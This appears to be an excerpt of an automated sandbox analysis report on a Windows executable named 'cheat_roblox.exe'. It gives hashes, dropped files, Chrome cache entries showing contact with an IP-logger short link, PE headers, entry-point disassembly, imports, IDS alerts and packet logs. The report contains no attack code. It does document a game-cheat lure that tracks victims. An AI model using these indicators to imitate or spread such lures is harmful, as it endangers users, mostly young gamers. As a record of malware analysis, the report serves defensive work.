                                                                            C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_666048289\manifest.json

                                                                            Download File
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):85
                                                                            Entropy (8bit):4.424014792499492
                                                                            Encrypted:false
                                                                            SSDEEP:3:rR6TAulhFphifFCmMARWHJqS1iLBRvY:F6VlM8aRWpqS1iLBW
                                                                            MD5:9A094D744241B990256BD73A9F0DE35B
                                                                            SHA1:0B903320B690921724C04EB0A97C92E5F1A446A4
                                                                            SHA-256:A018F1695956AAEB88D70F496D3E115C47E49931DA7AE48B0DF3D10238CC1C5A
                                                                            SHA-512:38AF8E23CC8CE4825CF974CA55144E8907C65091F411CED19E650CCE164CC9F1B4F8D854F4506C70377899615AB570609E8236633F2211C7328E462EB0043C4D
                                                                            Malicious:false
                                                                            Preview:{. "manifest_version": 2,. "name": "First Party Sets",. "version": "2024.7.24.0".}

                                                                            C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_666048289\sets.json

                                                                            Download File
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):9482
                                                                            Entropy (8bit):4.628404350796629
                                                                            Encrypted:false
                                                                            SSDEEP:96:Mon4mvCSqX1gs1blbw/BNKLcxbdmf56MFJtRTGXvcxN43uP+8qJq:v5CSqlKBkIVmtRTGXvcxBsq
                                                                            MD5:5BE545A21EBEEA747EAA08C476DEC2C7
                                                                            SHA1:3F6670F5C43147FA3DE5E768CF959DE2DAA34053
                                                                            SHA-256:B7C919CE2670AC0D8966E83AE141AE1B30EE8AD68581D42D92AC1C09BB161BED
                                                                            SHA-512:18DBC4779704D730584D02B4A5C2D1B9089F2503CB6DC847DA8128EA2215C0D70965CB3384934F5657C22F26DD68496EFAD05FD4AC95105BED7F3DB6351B24C6
                                                                            Malicious:false
                                                                            Preview:{"primary":"https://bild.de","associatedSites":["https://welt.de","https://autobild.de","https://computerbild.de","https://wieistmeineip.de"],"serviceSites":["https://www.asadcdn.com"]}.{"primary":"https://blackrock.com","associatedSites":["https://blackrockadvisorelite.it","https://cachematrix.com","https://efront.com","https://etfacademy.it","https://ishares.com"]}.{"primary":"https://cafemedia.com","associatedSites":["https://cardsayings.net","https://nourishingpursuits.com"]}.{"primary":"https://caracoltv.com","associatedSites":["https://noticiascaracol.com","https://bluradio.com","https://shock.co","https://bumbox.com","https://hjck.com"]}.{"primary":"https://carcostadvisor.com","ccTLDs":{"https://carcostadvisor.com":["https://carcostadvisor.be","https://carcostadvisor.fr"]}}.{"primary":"https://citybibleforum.org","associatedSites":["https://thirdspace.org.au"]}.{"primary":"https://cognitiveai.ru","associatedSites":["https://cognitive-ai.ru"]}.{"primary":"https://elpais.com.uy","

                                                                            Chrome Cache Entry: 141

                                                                            Download File
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                            Category:downloaded
                                                                            Size (bytes):2833
                                                                            Entropy (8bit):7.876846206921263
                                                                            Encrypted:false
                                                                            SSDEEP:48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
                                                                            MD5:18C023BC439B446F91BF942270882422
                                                                            SHA1:768D59E3085976DBA252232A65A4AF562675F782
                                                                            SHA-256:E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
                                                                            SHA-512:A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
                                                                            Malicious:false
                                                                            URL:https://cdn.iplogger.org/favicon.ico
                                                                            Preview:.PNG........IHDR...@...@......iq.....IDATx.....e.._Osm...,uY.sYI.w.$..........:VjD..!...o%....5$......... (..;~8."......h...r.^/}...|..qm.O.w..I.m....>..y>.?_.....;_=.b.R4X..4.2....S!.P.m>......*`........@.....O...\,...o..@..RS.5.3.....M..@.....>..|....2p ......v...-a.9........V..0.X....`(.....TH.i....o:.....'p3.[.Lx.q.1.....XN/j.M...y..+....!r.P........F.6....M.W./".QK.....?...r....f.7.?...7..y@..-` ......f.7..x.......z-......u6D...M.=.6D....`X..>.......`....?..-....s..\..._...Vc.&......rzM...9B....dJp.......|....@..O....."je...oGL..1.......R!5\.Q.7.......Mb.x.x....)E.u.b9.Ad.<..x.8.L!...8...aV#..|>.R...9+.....P......~..^...;?.#q......d.G.a`..I...c9..\..Cc',.l.-.......m.H..E......s.s...:.l>....L....u...g#Q..0.<...3.~=b.....TH.....M......K..a..R48....W.[..6...?...3.)..r.WHd8...o(.^.....]..~.8ef49..F......d.QF.zg).,.#.E.-..q..L.....^.u.x.XY....,.......C.i=lJ..c.?.4E=@......Y.r...`......Z.8].....A../.R...5.-.YG1...b.....y..x.".'Y...b1.....K..$..">..

                                                                            Chrome Cache Entry: 142

                                                                            Download File
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:GIF image data, version 87a, 31 x 31
                                                                            Category:dropped
                                                                            Size (bytes):445
                                                                            Entropy (8bit):7.051559084988302
                                                                            Encrypted:false
                                                                            SSDEEP:6:tj+cYUFqb9Oq2EWxiWlb+hKI526WogYAGJe9UCZE12REqtVv6n:tqeqZF3WxiHKI5KopAMQUD10EqtVv6
                                                                            MD5:1BD6EB140EC5E09AF54808BCE2BE74BE
                                                                            SHA1:00746108650919B88014CE35AABF72B0F20B2046
                                                                            SHA-256:3E13369E5C528A4598007330A7D572DADD181E268D0CF87BA7B62FD7668597F8
                                                                            SHA-512:FA58EB9D8DB6819BCD39EC73089942D7F16CA602322E3EFA592A3418FB735A87DF9FD5388830F8E1E699CB5457234626F2B09DACEC83E265F300CE19AA907DBE
                                                                            Malicious:false
                                                                            Preview:GIF87a...........V...B...."...j.2&.bB..B...v.ZN>..*&...R6.*"..*:&..b....r.&"..r.J....rJ....z...$..6&.....2..R...^>..^..j.~R...N6.jF...&...n...V:.>*...N2..Z.F.....z.."..f..v...vN..~.....,.............g.(.YH.o...T.H.F..v..v...wL.j......pR..W.........}lh|..~\gtY....u.\6&.j.\?4.d.\...^.$.[.(....Z=<.Z...[=....[.Y.+....Z7.....\.%...\:....[.3...Z.5...$.1.....y. .y...u.8.q'.!".e'...P......".a.E..*2..1....."\.....8`...;

                                                                            Chrome Cache Entry: 143

                                                                            Download File
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):2833
                                                                            Entropy (8bit):7.876846206921263
                                                                            Encrypted:false
                                                                            SSDEEP:48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
                                                                            MD5:18C023BC439B446F91BF942270882422
                                                                            SHA1:768D59E3085976DBA252232A65A4AF562675F782
                                                                            SHA-256:E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
                                                                            SHA-512:A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
                                                                            Malicious:false
                                                                            Preview:.PNG........IHDR...@...@......iq.....IDATx.....e.._Osm...,uY.sYI.w.$..........:VjD..!...o%....5$......... (..;~8."......h...r.^/}...|..qm.O.w..I.m....>..y>.?_.....;_=.b.R4X..4.2....S!.P.m>......*`........@.....O...\,...o..@..RS.5.3.....M..@.....>..|....2p ......v...-a.9........V..0.X....`(.....TH.i....o:.....'p3.[.Lx.q.1.....XN/j.M...y..+....!r.P........F.6....M.W./".QK.....?...r....f.7.?...7..y@..-` ......f.7..x.......z-......u6D...M.=.6D....`X..>.......`....?..-....s..\..._...Vc.&......rzM...9B....dJp.......|....@..O....."je...oGL..1.......R!5\.Q.7.......Mb.x.x....)E.u.b9.Ad.<..x.8.L!...8...aV#..|>.R...9+.....P......~..^...;?.#q......d.G.a`..I...c9..\..Cc',.l.-.......m.H..E......s.s...:.l>....L....u...g#Q..0.<...3.~=b.....TH.....M......K..a..R48....W.[..6...?...3.)..r.WHd8...o(.^.....]..~.8ef49..F......d.QF.zg).,.#.E.-..q..L.....^.u.x.XY....,.......C.i=lJ..c.?.4E=@......Y.r...`......Z.8].....A../.R...5.-.YG1...b.....y..x.".'Y...b1.....K..$..">..

                                                                            Chrome Cache Entry: 144

                                                                            Download File
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:GIF image data, version 87a, 31 x 31
                                                                            Category:downloaded
                                                                            Size (bytes):445
                                                                            Entropy (8bit):7.051559084988302
                                                                            Encrypted:false
                                                                            SSDEEP:6:tj+cYUFqb9Oq2EWxiWlb+hKI526WogYAGJe9UCZE12REqtVv6n:tqeqZF3WxiHKI5KopAMQUD10EqtVv6
                                                                            MD5:1BD6EB140EC5E09AF54808BCE2BE74BE
                                                                            SHA1:00746108650919B88014CE35AABF72B0F20B2046
                                                                            SHA-256:3E13369E5C528A4598007330A7D572DADD181E268D0CF87BA7B62FD7668597F8
                                                                            SHA-512:FA58EB9D8DB6819BCD39EC73089942D7F16CA602322E3EFA592A3418FB735A87DF9FD5388830F8E1E699CB5457234626F2B09DACEC83E265F300CE19AA907DBE
                                                                            Malicious:false
                                                                            URL:https://counter.yadro.ru/hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.07021634166148738
                                                                            Preview:GIF87a...........V...B...."...j.2&.bB..B...v.ZN>..*&...R6.*"..*:&..b....r.&"..r.J....rJ....z...$..6&.....2..R...^>..^..j.~R...N6.jF...&...n...V:.>*...N2..Z.F.....z.."..f..v...vN..~.....,.............g.(.YH.o...T.H.F..v..v...wL.j......pR..W.........}lh|..~\gtY....u.\6&.j.\?4.d.\...^.$.[.(....Z=<.Z...[=....[.Y.+....Z7.....\.%...\:....[.3...Z.5...$.1.....y. .y...u.8.q'.!".e'...P......".a.E..*2..1....."\.....8`...;

                                                                            Chrome Cache Entry: 145

                                                                            Download File
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460), with CRLF, CR, LF line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):9909
                                                                            Entropy (8bit):5.402425739040007
                                                                            Encrypted:false
                                                                            SSDEEP:192:DLlw+00cv13xV1cSHYu+zogDwIIhWp6psOsW4rqSxVEGz5R2WxSi1yz:D5w+Pcv13T1FH0fkIIm6QXxzP20u
                                                                            MD5:B7200222968BE4C34BD8C8902D298EC9
                                                                            SHA1:E197DCA77C595D0BD625A65CEF2B19A8625012CF
                                                                            SHA-256:0B2479797BDEA905C6E9DFEA1B675D8D99263EFFAF2206653600E3C8BC1EEAF8
                                                                            SHA-512:BAC81BCF0D3F47BC3A98FA501934BC331EAF6317CE682EEC5113A8D1B4249FEA7E70446F8F63C5EEF0B3A64FA74D979AC7F16D440D89BD643B80E03C8D2A2909
                                                                            Malicious:false
                                                                            URL:https://2no.co/24RXx6
                                                                            Preview:<!DOCTYPE html>.<html lang="US" class="html">.<head>..<title>Branded Short Domain</title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-2024" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="2no.co is a Branded Short Domain..." />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285"

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                            Entropy (8bit):7.909822900338073
                                                                            TrID:
                                                                            • Win64 Executable GUI (202006/5) 92.65%
                                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                                            • DOS Executable Generic (2002/1) 0.92%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:cheat_roblox.exe
                                                                            File size:2'675'335 bytes
                                                                            MD5:d49b1a211ce49bed3e766471501819c6
                                                                            SHA1:ed8f8b0d45ad556115c14a00247c080fa82d56e9
                                                                            SHA256:1673b4f5f2d5ae3e3d2c5816534bf904ed1d2653b4a40bbb2a320231eca8259a
                                                                            SHA512:2a0ec111c39ed2d5e02555a18a94f84bb546d1fc4f827ddeb24709b9b86259318611626a578918c5d8e60a5667e774c0d36241b6b668afb466a8806d37c2b7d2
                                                                            SSDEEP:49152:1Djlabwz97DQNxlq9fFQXLkL9g+/kW/4JNe0OL108Jgwya3fj8kSbn17:Zqw5skLZbaWL108JgwnvS5
                                                                            TLSH:48C5120AF3A509F8E073E57889474906F67A3C1A13319BCF13A5556B2F673A1CE2E352
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i...i.\.i...b.\.i...g.\.`.].C.\...Y.R.\...\.a.\.....a.\

                                                                            File Icon

                                                                            Icon Hash:1515d4d4442f2d2d

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x140032ee0
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x140000000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x66409723 [Sun May 12 10:17:07 2024 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:5
                                                                            OS Version Minor:2
                                                                            File Version Major:5
                                                                            File Version Minor:2
                                                                            Subsystem Version Major:5
                                                                            Subsystem Version Minor:2
                                                                            Import Hash:b1c5b1beabd90d9fdabd1df0779ea832

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            dec eax
                                                                            sub esp, 28h
                                                                            call 00007FB81CC4F3F8h
                                                                            dec eax
                                                                            add esp, 28h
                                                                            jmp 00007FB81CC4ED8Fh
                                                                            int3
                                                                            int3
                                                                            dec eax
                                                                            mov eax, esp
                                                                            dec eax
                                                                            mov dword ptr [eax+08h], ebx
                                                                            dec eax
                                                                            mov dword ptr [eax+10h], ebp
                                                                            dec eax
                                                                            mov dword ptr [eax+18h], esi
                                                                            dec eax
                                                                            mov dword ptr [eax+20h], edi
                                                                            inc ecx
                                                                            push esi
                                                                            dec eax
                                                                            sub esp, 20h
                                                                            dec ebp
                                                                            mov edx, dword ptr [ecx+38h]
                                                                            dec eax
                                                                            mov esi, edx
                                                                            dec ebp
                                                                            mov esi, eax
                                                                            dec eax
                                                                            mov ebp, ecx
                                                                            dec ecx
                                                                            mov edx, ecx
                                                                            dec eax
                                                                            mov ecx, esi
                                                                            dec ecx
                                                                            mov edi, ecx
                                                                            inc ecx
                                                                            mov ebx, dword ptr [edx]
                                                                            dec eax
                                                                            shl ebx, 04h
                                                                            dec ecx
                                                                            add ebx, edx
                                                                            dec esp
                                                                            lea eax, dword ptr [ebx+04h]
                                                                            call 00007FB81CC4E213h
                                                                            mov eax, dword ptr [ebp+04h]
                                                                            and al, 66h
                                                                            neg al
                                                                            mov eax, 00000001h
                                                                            sbb edx, edx
                                                                            neg edx
                                                                            add edx, eax
                                                                            test dword ptr [ebx+04h], edx
                                                                            je 00007FB81CC4EF23h
                                                                            dec esp
                                                                            mov ecx, edi
                                                                            dec ebp
                                                                            mov eax, esi
                                                                            dec eax
                                                                            mov edx, esi
                                                                            dec eax
                                                                            mov ecx, ebp
                                                                            call 00007FB81CC50F37h
                                                                            dec eax
                                                                            mov ebx, dword ptr [esp+30h]
                                                                            dec eax
                                                                            mov ebp, dword ptr [esp+38h]
                                                                            dec eax
                                                                            mov esi, dword ptr [esp+40h]
                                                                            dec eax
                                                                            mov edi, dword ptr [esp+48h]
                                                                            dec eax
                                                                            add esp, 20h
                                                                            inc ecx
                                                                            pop esi
                                                                            ret
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            dec eax
                                                                            sub esp, 48h
                                                                            dec eax
                                                                            lea ecx, dword ptr [esp+20h]
                                                                            call 00007FB81CC3D7A3h
                                                                            dec eax
                                                                            lea edx, dword ptr [00025747h]
                                                                            dec eax
                                                                            lea ecx, dword ptr [esp+20h]
                                                                            call 00007FB81CC4FFF2h
                                                                            int3
                                                                            jmp 00007FB81CC561D4h
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3

                                                                            Rich Headers

                                                                            Programming Language:
                                                                            • [ C ] VS2008 SP1 build 30729
                                                                            • [IMP] VS2008 SP1 build 30729

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x597a00x34.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x597d40x50.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x700000xe3bc.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x6a0000x306c.pdata
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x7f0000x970.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x536c00x54.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x537800x28.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x4b3f00x140.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x480000x508.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x588bc0x120.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x4676e0x46800f06bb06e02377ae8b223122e53be35c2False0.5372340425531915data6.47079645411382IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rdata0x480000x128c40x12a002de06d4a6920a6911e64ff20000ea72fFalse0.4499003775167785data5.273999097784603IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data0x5b0000xe75c0x1a000dbdb901a7d477980097e42e511a94fbFalse0.28275240384615385data3.2571023907881185IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .pdata0x6a0000x306c0x3200b0ce0f057741ad2a4ef4717079fa34e9False0.483359375data5.501810413666288IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .didat0x6e0000x3600x4001fcc7b1d7a02443319f8fcc2be4ca936False0.2578125data3.0459938492946015IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            _RDATA0x6f0000x15c0x2003f331ec50f09ba861beaf955b33712d5False0.408203125data3.3356393424384843IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .rsrc0x700000xe3bc0xe4001b279dad3e3d77fcdfb269a130bf474bFalse0.6334121436403509data6.778407783727912IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0x7f0000x9700xa0077a9ddfc47a5650d6eebbcc823e39532False0.52421875data5.336289720085303IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            PNG0x706740xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced1.0027729636048528
                                                                            PNG0x711bc0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced0.9363390441839495
                                                                            RT_ICON0x727680x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors0.47832369942196534
                                                                            RT_ICON0x72cd00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors0.5410649819494585
                                                                            RT_ICON0x735780xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors0.4933368869936034
                                                                            RT_ICON0x744200x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m0.5390070921985816
                                                                            RT_ICON0x748880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m0.41393058161350843
                                                                            RT_ICON0x759300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m0.3479253112033195
                                                                            RT_ICON0x77ed80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9809269502193401
                                                                            RT_DIALOG0x7bc4c0x2badata0.5286532951289399
                                                                            RT_DIALOG0x7bf080x13adata0.6560509554140127
                                                                            RT_DIALOG0x7c0440xf2data0.71900826446281
                                                                            RT_DIALOG0x7c1380x14adata0.6
                                                                            RT_DIALOG0x7c2840x314data0.47588832487309646
                                                                            RT_DIALOG0x7c5980x24adata0.6279863481228669
                                                                            RT_STRING0x7c7e40x1fcdata0.421259842519685
                                                                            RT_STRING0x7c9e00x246data0.41924398625429554
                                                                            RT_STRING0x7cc280x1a6data0.514218009478673
                                                                            RT_STRING0x7cdd00xdcdata0.65
                                                                            RT_STRING0x7ceac0x470data0.3873239436619718
                                                                            RT_STRING0x7d31c0x164data0.5056179775280899
                                                                            RT_STRING0x7d4800x110data0.5772058823529411
                                                                            RT_STRING0x7d5900x158data0.4563953488372093
                                                                            RT_STRING0x7d6e80xe8data0.5948275862068966
                                                                            RT_STRING0x7d7d00x1c6data0.5242290748898678
                                                                            RT_STRING0x7d9980x268data0.4837662337662338
                                                                            RT_GROUP_ICON0x7dc000x68data0.7019230769230769
                                                                            RT_MANIFEST0x7dc680x753XML 1.0 document, ASCII text, with CRLF line terminators0.3957333333333333

                                                                            Imports

                                                                            DLLImport
                                                                            KERNEL32.dllLocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindNextFileA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA
                                                                            OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                            gdiplus.dllGdipCloneImage, GdipFree, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipAlloc

                                                                            Network Behavior

                                                                            Suricata IDS Alerts

                                                                            TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                                            2024-07-30T00:56:50.218743+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434973020.12.23.50192.168.2.6
                                                                            2024-07-30T00:57:27.842535+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434975320.12.23.50192.168.2.6

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jul 30, 2024 00:56:27.772205114 CEST49674443192.168.2.6173.222.162.64
                                                                            Jul 30, 2024 00:56:27.772205114 CEST49673443192.168.2.6173.222.162.64
                                                                            Jul 30, 2024 00:56:28.100399971 CEST49672443192.168.2.6173.222.162.64
                                                                            Jul 30, 2024 00:56:33.383233070 CEST49712443192.168.2.6128.116.21.3
                                                                            Jul 30, 2024 00:56:33.383271933 CEST44349712128.116.21.3192.168.2.6
                                                                            Jul 30, 2024 00:56:33.383347988 CEST49712443192.168.2.6128.116.21.3
                                                                            Jul 30, 2024 00:56:33.385003090 CEST49712443192.168.2.6128.116.21.3
                                                                            Jul 30, 2024 00:56:33.385027885 CEST44349712128.116.21.3192.168.2.6
                                                                            Jul 30, 2024 00:56:34.113610029 CEST44349712128.116.21.3192.168.2.6
                                                                            Jul 30, 2024 00:56:34.118654013 CEST49712443192.168.2.6128.116.21.3
                                                                            Jul 30, 2024 00:56:34.118674040 CEST44349712128.116.21.3192.168.2.6
                                                                            Jul 30, 2024 00:56:34.120057106 CEST44349712128.116.21.3192.168.2.6
                                                                            Jul 30, 2024 00:56:34.120156050 CEST49712443192.168.2.6128.116.21.3
                                                                            Jul 30, 2024 00:56:34.121599913 CEST49712443192.168.2.6128.116.21.3
                                                                            Jul 30, 2024 00:56:34.121758938 CEST44349712128.116.21.3192.168.2.6
                                                                            Jul 30, 2024 00:56:34.121779919 CEST49712443192.168.2.6128.116.21.3
                                                                            Jul 30, 2024 00:56:34.121934891 CEST49712443192.168.2.6128.116.21.3
                                                                            Jul 30, 2024 00:56:34.148832083 CEST49715443192.168.2.6128.116.21.4
                                                                            Jul 30, 2024 00:56:34.148932934 CEST44349715128.116.21.4192.168.2.6
                                                                            Jul 30, 2024 00:56:34.151866913 CEST49715443192.168.2.6128.116.21.4
                                                                            Jul 30, 2024 00:56:34.152766943 CEST49715443192.168.2.6128.116.21.4
                                                                            Jul 30, 2024 00:56:34.152818918 CEST44349715128.116.21.4192.168.2.6
                                                                            Jul 30, 2024 00:56:34.865238905 CEST44349715128.116.21.4192.168.2.6
                                                                            Jul 30, 2024 00:56:34.866760969 CEST49715443192.168.2.6128.116.21.4
                                                                            Jul 30, 2024 00:56:34.866772890 CEST44349715128.116.21.4192.168.2.6
                                                                            Jul 30, 2024 00:56:34.867810965 CEST44349715128.116.21.4192.168.2.6
                                                                            Jul 30, 2024 00:56:34.867888927 CEST49715443192.168.2.6128.116.21.4
                                                                            Jul 30, 2024 00:56:34.869061947 CEST49715443192.168.2.6128.116.21.4
